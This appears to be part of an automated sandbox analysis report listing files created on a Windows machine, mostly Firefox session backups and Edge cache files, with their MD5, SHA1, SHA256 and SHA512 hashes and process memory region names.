SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 01e3be1134890887350b361ff9b8c681
SHA1 a92fb77350933689ce4dcf957e9979fd79169270
SHA256 63a6ae4640db7a3c51ed0366f5339e3ea321de2d3dc544599e7999245e1039bd
SHA512 4e7cc68ccc4a192ec865795d159bfb51b13b5347bfc6083dcd86fbf214b0349d6c05bdbd4795ac37f41cd2c83ca309e4fae7faa37a6eaadd2fe2f230196adde8

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log

MD5 16c5fce5f7230eea11598ec11ed42862
SHA1 75392d4824706090f5e8907eee1059349c927600
SHA256 87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151
SHA512 153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 dec02dc294a2834629f0c504d7d2033c
SHA1 316f0c50a22c3c8873f10c9eb2c9ba6c5d608880
SHA256 4cbb3436537a98b1927444b71909ce7fae99596590f20d8f7f1d8b3ffa53a966
SHA512 ed090f5adb78344d5231699f8e87b9cd94bd13069cba03622975ff24faac6fffe4fcfa6dacb31887fca1dd2a7054e5efbfdd54a0236cc8f7b28b2523a4923a66

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 f996183be2b71a7aaca59b4fa743b6bb
SHA1 b30f5cfadb9b97d920700597c5fbb0e8b17d34bc
SHA256 f48004ab1bb2d79f473753cf8a9a2e5cd413355dfc273a983ef06a3e72d27af6
SHA512 8d29d435ea74ed49cd0993cc412cf9ae61a8d95277f0f9fdda8c612e4e2d9cf97b8175200b300abe53cbbe6856f4c5c9ad33b93e4580acf67700232e61d4b34a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 d4ecd037f97483309ceadc5a41b23ea4
SHA1 0778028c2ecf1c9623f6889f38537cbb099c26d9
SHA256 b85f204586b0ac6ea4a086200645723f2e1e2962e45873f11f7ad917b333f490
SHA512 9e39ea418f44c78ff035eecd6c779f4f792369c3e743377510391e4885e92833703d6cbdf9743220a35086ef6458c1734ec3a0df96859ad8f28373d37c392559

memory/3172-1161-0x00000000010E0000-0x00000000010EC000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 a32777d92780fe997d46965f96edb88b
SHA1 73ff14d8f1663a5e7441a17bc06f4b6711947b47
SHA256 b53e51b4540de993c3fb5c557707429c4a2c1fc52033c9a0f3af5c0ffac5908d
SHA512 db3abaf107bf9d7a9ce240c371334a383e519a9f734cd98aa57ff13096ecd9a0e725d3f81832649d9908841368001812355544e6cd109a30f31b028bf539f0a2

memory/3172-1170-0x000000001B4B0000-0x000000001B53E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 0fdffaaf60fac3dec808113a9d8a475c
SHA1 517e1ec4707dcf3f288e539b7bda901b0a19ad2b
SHA256 3d0211f6009524d6977dd9a8228106bfc2cb9e5fc0378d6faef861bc39546dd1
SHA512 79e4ca3ee1ab94958648eaf5c1eaf4fedebc3c330d4269464a1103567726a54f697ce088854153fa745b0e682efb1259616cb4841404ccdba88c5a0f4f436f33

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 041f5dbafd23f788463381eed941847a
SHA1 8fdc2e7e15d8a422ff08a392048a009f27c3bf61
SHA256 26ec00272fbe71274adafd8e97f916a45399dd2b42f53ea4df76bb82b3a5619e
SHA512 5461e3f9f3357f8075a5753148ebc1540b5d1620048b2a7a343426fd1f79321fb6be047a746584f0e4c0e16e4ba993d247f7c9a5cac82197cf8fe5a78177bd8a

memory/3172-1192-0x00000000011B0000-0x00000000011BA000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 50fb02d5ebe5c890e8b29fcffae746a3
SHA1 d3380e95bd0cf4638c1252856af83e5e66cfbf95
SHA256 c3bd66d4389a7fe8067655b7c5056d6ae93008e13e12d8e53057ce903611ddfa
SHA512 2fd132e3e9820898e34d88ec7adb0df977af227de3f5a85382ee90e5b61eae1d3fa8cfe7c08ba90b2f568c964e4cd109fae2c2aaa1b11dc51a329f3e550c42b9

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\prefs-1.js

MD5 e2d7b5dc4ab2caa48ce2c2d6a8ef0e05
SHA1 0c4f0f4738f0119dd205f0c87fb314ef63d2dd7f
SHA256 fba3ce15400e50a81b2deb1708b20813db52da4bd61b9cf1c684c6aef46e8dd6
SHA512 40d35ecd4cd64fa0646aff5f3bd7b06aa616ff78b8a9d8bd17bcd381f1a42ea6322457408707bdd82b0207732b6e993f438ea90c81163a0967f699452fd5beb7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\broadcast-listeners.json

MD5 72c95709e1a3b27919e13d28bbe8e8a2
SHA1 00892decbee63d627057730bfc0c6a4f13099ee4
SHA256 9cf589357fceea2f37cd1a925e5d33fd517a44d22a16c357f7fb5d4d187034aa
SHA512 613ca9dd2d12afe31fb2c4a8d9337eeecfb58dabaeaaba11404b9a736a4073dfd9b473ba27c1183d3cc91d5a9233a83dce5a135a81f755d978cea9e198209182

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionCheckpoints.json

MD5 c4ab2ee59ca41b6d6a6ea911f35bdc00
SHA1 5942cd6505fc8a9daba403b082067e1cdefdfbc4
SHA256 00ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2
SHA512 71ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\targeting.snapshot.json

MD5 edfba10a9cd8b97095344453d024a733
SHA1 7a84c2da263b102c2c5b1b7f88cc20a72e8e429d
SHA256 fa9676ab1a172336bd8228fabf80760d67a3fb505128139e1cef297d802f72dd
SHA512 b8c12140341493d70cfd0441a480c96125a77a7d6e65ea043191bc2e65a7cfe890e1da0f5c8e12e77a8e6ee8765a1eaa6ed062223b417b7732b95d49c2d60696

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 8a7bd80b9a1bf23c8abcd24415d990c3
SHA1 953dc657a3f71eb80bd85d00d60c6267bfa9ad2d
SHA256 9edde090876494709c3ea4a322fd5e27b147ae8a9f35a4acfe711e6eed14f870
SHA512 00dddc3cbf2cfffe844a20246b4eda5fd6471743a9ad284a2eb12869017355585ca53b0ee86ff7355fd51e3658e7e2438c9f5b870952f9a40d6d9b32b4707e45

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 2da7a1b8d8bbeeb3618aab90433c2631
SHA1 269c69378030c5e9cc5efe7a8a3e80f99acd82bd
SHA256 27e5368713002724b9fd3e2b1bb55024329d283d891ddc7010f7ca9ce34bb331
SHA512 e03ce8e07e09bcaae4ff4e8832d9a7fffb0a6c5c46528a3c51fa600ef6fde8a3c5b367ff0c32cc8c3adbffb07ce196f777c4594993310e31eccb054c2ab7c017

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 9a2766fe73084fd83ae53cb5c8c52e97
SHA1 fc734a54e030af524a185e860cdf1831386b7d15
SHA256 1639edd25e9550164ff38683b803a83a97d408057fc90f0a0a0a6710e96dd60d
SHA512 cb0ed0c406807375ed10368b5c52c49f19b4b91f2109daa601970e8d645f1f8801bc2abf049a04c11adc02503040a53a4e7d9f5f7497d37f68d04a77fcb9fbd0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\bookmarkbackups\bookmarks-2024-04-26_11_MaaMR8mhAQTbCgvsLumwIQ==.jsonlz4

MD5 838d93fe7f64f4f752cc6aa88379ef54
SHA1 55f0a2bd40fd96e3a319f886a58891fd9d416c0b
SHA256 1b13e0ebb1dab164edd26588e55ea99c9909f18c56c9a3478937d96719d9a54d
SHA512 8a4fddabc8792bc2fdc4868e1873f415614c3dc08bbb50272b64fbab124b4516ab0e3be04f31cfb8e02e7b653bff231053208d1638dcf0372439dcec71d33f00

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 be7e73da3539dc4f2aec00edef19cb89
SHA1 78bb7de35efdc08935537f68cf3d8bafa471f9f8
SHA256 0517f087376ea1358509e4867d878070cba9ddeb6e24c4b51e32adbd378d1b7a
SHA512 64f00383eca7813465eb00c0540b00807c88a645e557eea2b4048dc897863efe4159a2ce97d7ea181a683432e6cab67718714ec2025e948c86a78527a303b052

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 ded90f0ee21d4684f5cdac179001f169
SHA1 7f612af964a576660d428bebc87d04082b68dcf1
SHA256 ff7435ce30cffdced7c0913810fac71e38891697a4a271424109a8f1fb6201cb
SHA512 a73c62b5a7278597d9bd0adc6668a11a6c6e24d2daec1f496823e5e23c9d89de58662878fd2d710c7f7e508a23a065fc9287ed161d8e10a388f3b36482018278

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 d945a0b1e171065d5491eca4ceafa37c
SHA1 47a98ae32bcd80f0d4ea7cc2cc409ab1a37515cd
SHA256 6fa6a066538e61c84bc0134ecf9b62f01d86a35ca99fdbd77db1a0c57a7f1b02
SHA512 14a1d67c1c59de8ad85f09caf74643928a4f36a17541747ce569f931de981e3f97d47a7c6c8509c4390ba069e308d3bda36da1289984f3d74ae8149324bb96ce

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 62827cb95b2bf00cc4983712c917f1a6
SHA1 d84e91de55c0113f3cd5fa8376db3c2f0faaecf6
SHA256 14ae5bb91ea0f0a51a9b7f57437a7ddbe140df9d3da0affc981b0b318f398900
SHA512 3ef54cc9a66595b63da8a34513a273cb3d59df29284846cc329372978439a65d184c7e0a7e20e97394d78717c4500fa0b48442c52934b779ee0e6c836a0d0c05

memory/3172-1405-0x000000001B560000-0x000000001B572000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 2cd6a220d6c116f48f15d41415046592
SHA1 43d39f4896d7b19d24c549fee1d2209e9e082f4c
SHA256 99b7967e14acd6f65a1c1073fbc824b17a77d8a29d5bcb3dea66b2b49c7bb757
SHA512 10c7d2928b9cfde5076ffd320f9538f83d18472530ad4060f7d9e0520da33ef9a2bc4e169492bc5837c07031037b6e0f8c50a16857a837e0c00d909b7dfeef1f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 5a3a237586a89f481524e4045be7b6f4
SHA1 b5d57f37126bedfd298f93a9e00976b0a9434937
SHA256 1f0ae020a90762fc85d3876ff819692e1eee3671edf155579d599cb2e7cde067
SHA512 e7eb30b0a03bb267c0a4a4696da6cbd701cb67a723df5d330cd10fe8078a4bb027cece59bcd34b13a1a1dea7ec9ff6df7d02b2e93184bad77a520d86019ad891

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 b83fde10314a840a020fe4b56776e1cd
SHA1 122cdfa716f9759a32c9ebdb859371f524204e5d
SHA256 49dc0189909afde29c249b99174d87407c65bf2f192d9a32e33324339cc284b1
SHA512 9c6541a85758eae13e2ac6212bda4fe04a2d747d37a11428a6e6f71eeafbee02df54a57026b164d4bfde6fb8664388404d449dafd007b36fb5a031c604c04ae5

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 b50c06c61a473a3af3c992364d70c8b7
SHA1 43fdcd073e24ffe002440db5961c401816659e60
SHA256 7ea8117a98ff4f1d816e07ce064e1a3bfe323e8e63bbe9229e86e8ec1990cdc7
SHA512 260220f0cfc2d64e414bfc906aedb03ba3e58611da00c945d500bffaa4c600b7b6b4ff81de7d738aac5b35b8d302059804cad0cb5a406d5a66221431ea91e038

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 d0945e739ebf61729f12bca2ae7866a6
SHA1 1adf8c749837561583026b535144afa479031563
SHA256 9047e372a584ec0a18f581868da965598486548d595d8398bb8ffee5470aa14d
SHA512 35ba3093a1c5520bf55d2a892a3ebd5095bfe2c0f85b5a99a9d3bfb706d477c5a10feefd432a4e96af9d35f5b4b8484629fc3f1da0268e3f507d0f5c93463028

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 e693a7b8c6d011a3ee999212fef6f8af
SHA1 6492669447a3b7e37c2586f5ec92bf9c57b0df72
SHA256 8170138141dea2a5aa7b1f598abb89baa8667109be47cd6fe1ded428aa33dc80
SHA512 f6dc0cb07fa63b9b531712a0d53ef2f2365fa7dd8073b640b91257965c95d1ce8d59bd726fc0653ff07a1f2a16a1e8acc3c371842e0bc6ae83d6ab0542d6c4c2

memory/1788-1484-0x0000024481600000-0x0000024481610000-memory.dmp

memory/1788-1468-0x0000024481500000-0x0000024481510000-memory.dmp

memory/1788-1503-0x0000024485860000-0x0000024485862000-memory.dmp

memory/5520-1511-0x000002A2B1200000-0x000002A2B1300000-memory.dmp

memory/5520-1512-0x000002A2B1200000-0x000002A2B1300000-memory.dmp

memory/5520-1510-0x000002A2B1200000-0x000002A2B1300000-memory.dmp

memory/404-1527-0x00000277BC900000-0x00000277BCA00000-memory.dmp

memory/404-1530-0x00000277BC670000-0x00000277BC672000-memory.dmp

memory/404-1534-0x00000277BC6B0000-0x00000277BC6B2000-memory.dmp

memory/404-1532-0x00000277BC690000-0x00000277BC692000-memory.dmp

memory/404-1556-0x00000277CDD70000-0x00000277CDE70000-memory.dmp

memory/404-1588-0x00000277CFC00000-0x00000277CFD00000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878

MD5 7665489e087b66e2e4a86748ae5ddbd6
SHA1 432dbea22f1be3a6551976b48d3b4e727612a44f
SHA256 b6a61bbd73867e678a2f63026700607c9da40fdcdc4e78bd7da31c357467be4e
SHA512 ff655a055f054952d72ea4b2d92e5f4dcd677ee900601d7392cf3acaba64f2ef71e9c90192c8f61577964399efc0878564d6ba4fd3d628f53b226ddef2db5d6d

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878

MD5 2922939339db260048aef8adc8ad3a3b
SHA1 f88f5a1cae878e009acb44e184639d83a37aefd4
SHA256 f22e84ebc4b683dc4e166a9eb13ea96312171ef876b3aa07aa9f1932afec95f7
SHA512 d225c0dad835c350e65771301d1be39e9dd8b45c0047d83683527581359c8c025a8772d7310e36c723dc9ec2c3ff354e8f1159996eb6842ca9cd116aa75330e7

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

MD5 ac89a852c2aaa3d389b2d2dd312ad367
SHA1 8f421dd6493c61dbda6b839e2debb7b50a20c930
SHA256 0b720e19270c672f9b6e0ec40b468ac49376807de08a814573fe038779534f45
SHA512 c6a88f33688cc0c287f04005e07d5b5e4a8721d204aa429f93ade2a56aeb86e05d89a8f7a44c1e93359a185a4c5f418240c6cdbc5a21314226681c744cf37f36

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

MD5 4335b1f9715c6a37980b52911b512f04
SHA1 b0edd8f6c04d657b11e391c91ea838ef266c00c3
SHA256 079ed8e813eb9a3d71f4139df6658035db6f1c11a47fef18e54691f0e53e83a9
SHA512 df55e07d05cb27bbc5fe162def1b4d0db401bac75949ae910fe8ddeca3d9e935ebac9a5d4b9f47218fb893f98c76bd0a21b5e4b9a43c027bbf494eba296baf10

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 069d0310ee29b489c012daa53bbb802d
SHA1 4d1a5fa55d576282b7f308cc8c1fe1ad07ffbc2b
SHA256 8dfae75ff4c447e989ab690b07a4eff686c15a190fdcfe10a4b774eacd029a1f
SHA512 941a3257318a76ac1a939a2c64a9a93764a4f745fecab2ae5b9a7481c85f22f115cccc016917f94ff6e8beef62a6ce23b862bc7507bfe6355649f1baac2a0972

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 754885df53a820eedf1205c148efacc3
SHA1 73ea55048725233e91291d54f272c77d99de212a
SHA256 de080c6253f2960a88c6e6388ef09f90a4ec4a672f70a0e7158f711639058571
SHA512 6435c6c29b085ea9cc342d2d950d081c3d723f4b653f86e5617cdd1cfd1ca6425fff1a1f24f22fc2d0aac05791b4854b6466481bec2be7df25f8d0f8c1a240e7

memory/2340-1608-0x0000029A238C0000-0x0000029A239C0000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\LLA4BR6N\intersection-observer.min[1].js

MD5 936a7c8159737df8dce532f9ea4d38b4
SHA1 8834ea22eff1bdfd35d2ef3f76d0e552e75e83c5
SHA256 3ea95af77e18116ed0e8b52bb2c0794d1259150671e02994ac2a8845bd1ad5b9
SHA512 54471260a278d5e740782524392249427366c56b288c302c73d643a24c96d99a487507fbe1c47e050a52144713dfeb64cd37bc6359f443ce5f8feb1a2856a70a

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\LLA4BR6N\webcomponents-ce-sd[1].js

MD5 c1d7b8b36bf9bd97dcb514a4212c8ea5
SHA1 e3957af856710e15404788a87c98fdbb85d3e52e
SHA256 2fed236a295c611b4be5b9bc8608978e148c893e0c51944486982583b210668a
SHA512 0d44065c534313572d90232eb3f88eb308590304c879e38a09d6f2891f92385dc7495aabd776433f7d493d004001b714c7f89855aa6f6bec61c77d50e3a4b8e6

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\LLA4BR6N\web-animations-next-lite.min[1].js

MD5 44ca3d8fd5ff91ed90d1a2ab099ef91e
SHA1 79b76340ca0781fd98aa5b8fdca9496665810195
SHA256 c12e3ac9660ae5de2d775a8c52e22610fff7a651fa069cfa8f64675a7b0a6415
SHA512 a5ce9d846fb4c43a078d364974b22c18a504cdbf2da3d36c689d450a5dc7d0be156a29e11df301ff7e187b831e14a6e5b037aad22f00c03280ee1ad1e829dac8

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\AOQRPCUP\www-i18n-constants[1].js

MD5 f3356b556175318cf67ab48f11f2421b
SHA1 ace644324f1ce43e3968401ecf7f6c02ce78f8b7
SHA256 263c24ac72cb26ab60b4b2911da2b45fef9b1fe69bbb7df59191bb4c1e9969cd
SHA512 a2e5b90b1944a9d8096ae767d73db0ec5f12691cf1aebd870ad8e55902ceb81b27a3c099d924c17d3d51f7dbc4c3dd71d1b63eb9d3048e37f71b2f323681b0ad

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\LLA4BR6N\scheduler[1].js

MD5 dac3d45d4ce59d457459a8dbfcd30232
SHA1 946dd6b08eb3cf2d063410f9ef2636d648ddb747
SHA256 58ae013b8e95b7667124263f632b49a10acf7da2889547f2d9e4b279708a29f0
SHA512 4f190ce27669725dac9cf944eafed150e16b5f9c1e16a0bbf715de67b9b5a44369c4835da36e37b2786aaf38103fdc1f7de3f60d0dc50163f2528d514ebe2243

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_94792986739A07D7C677389B609C9549

MD5 de82d42a975c8016a713dc2db5928817
SHA1 34a4332de0d4db79cb2c7cdce70d0bd19f8b8d23
SHA256 3d7092c5193629502aeb800a22d2c772ebd1a2d5845683ecb1a696ff2826b580
SHA512 be47b200cc40a77eaf0eb730df220e68f617cdd649720f2e0443ba8749da2cb1ceac5181881f3aec9d851095fd195e6e0db170ea9750bac69a147c93d768f274

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\M5JLJ3LG\css2[1].css

MD5 5912f3bba71c222672dfa244a60acef0
SHA1 317a49729bb8654c3986e6b32278258a1d692d81
SHA256 48708ab3b01bc53a736f7f85e0badd9174872faa981e78b32c16c4efcaa59d99
SHA512 770f13af0d6ebe7ff9d925efccd05b0b2e5afd5fbe19770562d88936d541a298a49aea028f5122a255fb5026b4a5f37c0cf52831212ecaaf378a5769ff0379f7

memory/2340-1645-0x0000029A34C50000-0x0000029A34D50000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\AOQRPCUP\network[1].js

MD5 a36f25447b3d55d31fdfdc30fa31c3f6
SHA1 81154e36fdda94a482fb7f079ef683fa3af68f1b
SHA256 1432216f926190d39c5e9b17f38a4e075c692650eddb3df32e2a55d6b3eb6f9f
SHA512 2b396c5f278953dfb1ffa324e35150cd375218cc993510fc1643df68847d7d951efe2208423fd8f467a46f4b14fd8b3d7af06c7d24ab8f1753789cfc920587fe

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\AOQRPCUP\spf[1].js

MD5 9df260ef5f689e597011f8a110bf0156
SHA1 7cf9959f50ee5c0eb7653cd7b9d56e9e13c61325
SHA256 8e184352e6a0026e43c829910615fc408a900dad2f388d1b284756d1a7b0b62e
SHA512 099ea70bc08630b933e83c3033ae049c19940ca9e8f0eb42eb764552a9649493606eab56f683aa72df356ef53a9b37a63493a349e86a098fa82aa0ef75387cd8

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\AOQRPCUP\base[1].js

MD5 99d94118b126f0e6fa930656e9aeec5f
SHA1 fde794b877a215638b07225c393d23d93d090169
SHA256 d23c0ec3c06e663c17df265a07da5a6a5d0ced529cbf10c842df6cc9934867d7
SHA512 0aa8e01192ac2f7eda8ac27c1ae67cd2c2e8b927a567578b6575a86892183e2a0d9de6d09b907152dac18a67fe041d1a4948d762fb29cc23b960e1ddc954d2b9

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\AOQRPCUP\rs=AGKMywH7OenIozOPso_R4eAze85u9ntbZg[1].css

MD5 0d4df52d0ae450290f831b5e296fc4d1
SHA1 673b85f8dd75d27097fdab6c6a4e724e07cf2099
SHA256 c9b7d2799f5544c71e7a43c890952f0b7edf08ba5fe83fa05b4ef5c901590251
SHA512 865107ca766a23b888a190ccfbf7c63e5bf4b8d42102baf4b0558e9b137ee25b19800d7d91a60ad2d3f28f33772daddc67d5430d9f50bdd918fa810c2a37d0d8

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\LLA4BR6N\www-onepick[1].css

MD5 9ace9ca4e10a48822a48955cbd3f94d0
SHA1 1f0efa2ee544e5b7a98de5201fb8254b6f3eb613
SHA256 f8fdbb9c5cdceb1363bb04c5e89b3288ea30d79ef1a332e7a06c7195dd2e0ec4
SHA512 25354aeecb224fd6d863c0253cd7ad382dce7067f4147790ee0ce343f8c3e0efb84e54dd174116e7ad52d4a7e05735039fa1085b739abbe80f9e318e432eed73

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\OQZLHADN\www-main-desktop-player-skeleton[1].css

MD5 2a5f27d8d291d864d13eaa1f5cd9cd51
SHA1 b39f9b99b924e5251ac48fad818d78999cfd78d4
SHA256 056232b6127143e2f8bf4218db355d978e1e96f5dedcce59a9f5d6ab92b437f1
SHA512 1b54f1e13cb38e41f2a65db3cdc2bc702a9e963751b1ef0338d67b95816441b0143e1d4dabc99f276a04f9c00570bb8933f1bd87394998b3878c268b08ecf24a

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\OQZLHADN\www-main-desktop-watch-page-skeleton[1].css

MD5 64c8e3b11cfffc8ebf2240e4f46ab492
SHA1 71276680811731f983502e477a87e87cfe72d75f
SHA256 3acc199c41eb3c884ee9884c15e6b78975499be2255aa203dba38ef24440181c
SHA512 497a48233bb198e05517e2cba003c2c5ba25183e1654b5b8252b9823f0859497ccab66a77e243238b27ea6eb826ae4fc72efb2f32b2b378edee7f9dfb87f4756

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\LLA4BR6N\www-player[1].css

MD5 c0aca454c0a9b539d3af1213a20c6625
SHA1 9893a760290f6d8a9fed3a9f3129e7285b702430
SHA256 13a3fa279a6816ddd952f42fd82f5bc170ac2ff89410d14d43954b342ad40040
SHA512 bc26522c0a1fd3f40af510ab903431c61a990e06cbc63e8806d30acb52414d6962b4ca51faff78d3a77bf9fae058b5343c29e033b42b7c7f277dad919dd6d8be

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_94792986739A07D7C677389B609C9549

MD5 edcd426c2e88836cd13c98a8fb009401
SHA1 6d04f9da8e87fd36deed8fb9a72e0e780be22134
SHA256 597d4309cb9dfff967d65d844b63a2562bd97283daa0cc7c143e44c07fde22af
SHA512 439685606ddd9a6f0557ca76d7e59adbbd659555ffaf6e0dcaa278e7c9cf2588c090a70fa97dab43cb918b8d283c9813f7fae6cb7bc8736f076e22b3fcb59e33

memory/4892-1657-0x0000023CBFD00000-0x0000023CBFE00000-memory.dmp

memory/4892-1666-0x0000023CBF6F0000-0x0000023CBF6F2000-memory.dmp

memory/4892-1662-0x0000023CBF690000-0x0000023CBF692000-memory.dmp

memory/4892-1660-0x0000023CBF630000-0x0000023CBF632000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 c9f2074a81023775dd918279e488626e
SHA1 19a0c7439858e11dd43b7e683afaa04a862a8a41
SHA256 34469333142007c2d4598929fbbd342170d68612a41b0ea3915f0747c1dca02b
SHA512 91165d8f9f90953ee17c0071a0c3f60f3649ca99e073b7b0089add712d69acf01719c0f919280ca6b61e38048227da985f1f02dfeac23438a3179770eb3650f1

